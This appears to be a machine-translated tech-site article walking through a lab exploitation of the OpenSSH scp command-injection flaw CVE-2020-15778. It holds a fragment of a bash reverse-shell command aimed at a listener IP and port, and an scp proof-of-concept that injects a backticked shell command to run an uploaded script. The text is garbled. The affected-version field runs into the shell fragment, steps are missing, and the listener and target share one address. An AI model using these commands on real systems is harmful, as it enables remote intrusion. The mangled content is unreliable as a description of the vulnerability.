Shulou(Shulou.com)06/01 Report--

In this issue, the editor will bring you an example analysis of the OpenSSH command injection vulnerability CVE-2020-15778. The article is rich in content and analyzes and describes it from a professional point of view. I hope you can get something after reading this article.

Introduction of 0x00 vulnerabilities

CVE number: CVE-2020-15778

Release time: 2020-07-24

Hazard level: high risk

Vulnerability version: & / dev/tcp/192.168.207.156/4444 0 > & 1

2. Use the scp command to upload the file to / tmp of the target machine.

3. Enter the command on the new command line page:

4. Use POC to execute commands remotely.

Scp 1.sh root@192.168.207.156:' `sh / tmp/ 1.sh`

5. You can see that after typing the password, the shell has rebounded successfully after a while, and the experiment is over.

0x04 vulnerability defense

1. Make sure the ssh password is not leaked, and wait for a new version of openssh.

2. Upgrade the ssh version

3. Wait for the manufacturer to release the patch

The above is the example of the OpenSSH command injection vulnerability CVE-2020-15778 shared by the editor. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.